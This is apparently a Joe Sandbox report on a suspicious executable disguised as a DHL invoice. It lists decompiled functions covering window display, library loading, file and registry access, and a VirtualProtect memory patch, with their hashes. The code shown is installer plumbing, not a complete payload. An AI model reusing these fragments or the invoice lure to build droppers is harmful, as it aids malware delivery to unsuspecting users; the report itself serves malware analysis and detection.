Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 0ff4c43ca7c5305b810fc1be34eeb667a1865b3eede0763af0d3e02c0eb9f5d7
Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
Opcode Fuzzy Hash: 0ff4c43ca7c5305b810fc1be34eeb667a1865b3eede0763af0d3e02c0eb9f5d7
Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x4291d0;
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x24)); // executed
					_t4 =  *(_t16 - 0x28);
				}
				_t12 =  *0x4291e4;
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402ac8
0x00402ad4

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 74a05451266317358242c1387232137969cb845ec6119211e81d0784f0443df5
Instruction ID: 5a19d233efad038c8b2c136f8d26bdd3a0ec8095e28a03ee1255231ebf4f6cbd
Opcode Fuzzy Hash: 74a05451266317358242c1387232137969cb845ec6119211e81d0784f0443df5
Instruction Fuzzy Hash: 35E04F36B10105ABCB24CBA4ED848AE77A5AB88310764057BE502B32A0CA75AD51CF78

Uniqueness

Uniqueness Score: -1.00%

Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040665E(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065EE(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406666
0x00406669
0x00406670
0x00406678
0x00406684
0x00000000
0x0040668b
0x0040667b
0x00406682
0x00000000
0x00406693
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
Part of subcall function 004065EE: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406654

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405D7A(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405d7e
0x00405d8b
0x00405da0
0x00405da6

APIs

GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405D55 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D55(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405d5a
0x00405d60
0x00405d65
0x00405d6e
0x00405d6e
0x00405d77

APIs

GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: a3d3d340e07fbe3a7a5d47ed685d46f7c513eabc37ca73d627b83f1c605c53fe
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: DFD0C972504820ABC6512728EF0C89BBB95DB542717028B35FAA9A22B0DB304C568A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405838(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x0040583e
0x00405846
0x00000000
0x0040584c
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E

Uniqueness

Uniqueness Score: -1.00%

Function 0327AE60 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

EnumWindows.USER32(E9E07782,?,?), ref: 0327AEEC

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 1b301bc6dbecfd51218eb27bf3225a00dba87d059cdc0b130eba2a8ceb3f8cac
Instruction ID: e128ff42599b4d0153ffe794c5c1744cbfd28a05141d92be772f14d2c946429e
Opcode Fuzzy Hash: 1b301bc6dbecfd51218eb27bf3225a00dba87d059cdc0b130eba2a8ceb3f8cac
Instruction Fuzzy Hash: 191166B066125A2EC716DE395C846DA7B9DFF8F250F84802ED6288FB83DB7207024791

Uniqueness

Uniqueness Score: -1.00%

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040230C(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C41(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C41(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C41(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C41(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x0040230c
0x0040230c
0x0040230e
0x00402312
0x00402315
0x0040231a
0x0040231f
0x00402328
0x00402328
0x0040232d
0x00402336
0x00402336
0x00402343
0x004015b4
0x004015b6
0x0040288b
0x0040288b
0x00402ac8
0x00402ad4

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Uniqueness

Uniqueness Score: -1.00%

Function 0040611F Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040611F(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406076(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00406129
0x00406132
0x00406148
0x00000000
0x00406148
0x00406136
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675

Uniqueness

Uniqueness Score: -1.00%

Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E2C(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e30
0x00405e40
0x00405e48
0x00000000
0x00405e4f
0x00000000
0x00405e51

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8

Uniqueness

Uniqueness Score: -1.00%

Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DFD(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e01
0x00405e11
0x00405e19
0x00000000
0x00405e20
0x00000000
0x00405e22

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4

Uniqueness

Uniqueness Score: -1.00%

Function 74112997 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x74114048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7411405c, 4, 0x40, 0x7411404c); // executed
					 *0x7411405c = 0xc2;
					 *0x7411404c = 0;
					 *0x74114054 = 0;
					 *0x74114068 = 0;
					 *0x74114058 = 0;
					 *0x74114050 = 0;
					 *0x74114060 = 0;
					 *0x7411405e = 0;
				}
				return 1;
			}

0x741129a0
0x741129a5
0x741129b5
0x741129bd
0x741129c4
0x741129c9
0x741129ce
0x741129d3
0x741129d8
0x741129dd
0x741129e2
0x741129e2
0x741129ea

APIs

VirtualProtect.KERNELBASE(7411405C,00000004,00000040,7411404C), ref: 741129B5

Memory Dump Source

Source File: 00000001.00000002.18002086592.0000000074111000.00000020.00000001.01000000.00000004.sdmp, Offset: 74110000, based on PE: true

Associated: 00000001.00000002.18002024165.0000000074110000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002166253.0000000074113000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002259835.0000000074115000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74110000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 575df83581472c98932844fb3218c54b5831d2baef234217f8a23923bdb2c32c
Instruction ID: d397271624f05b3d6ddb4e57151eafd71397a9b37359a428182fe1347e0e2e6b
Opcode Fuzzy Hash: 575df83581472c98932844fb3218c54b5831d2baef234217f8a23923bdb2c32c
Instruction Fuzzy Hash: 36F092B27A8281DEC350EF6B86447C53BE0E348A14B26467AF1A9DB242F3344644CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040234E(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t19;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402C41(1);
				 *(_t21 - 0x4c) = E00402C41(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x4c), _t21 + 8, _t19, 0x3ff, E00402C41(0xffffffdd)); // executed
				_t24 =  *_t19 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t19 = __ebx;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040234e
0x00402355
0x00402358
0x00402368
0x0040237f
0x00402385
0x00401751
0x00402859
0x00402860
0x00402860
0x00402ac8
0x00402ad4

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745

Uniqueness

Uniqueness Score: -1.00%

Function 004060F1 Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060F1(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406076(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004060fb
0x00406102
0x00406115
0x00000000
0x00406115
0x00406106
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,Call,?), ref: 00406115

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

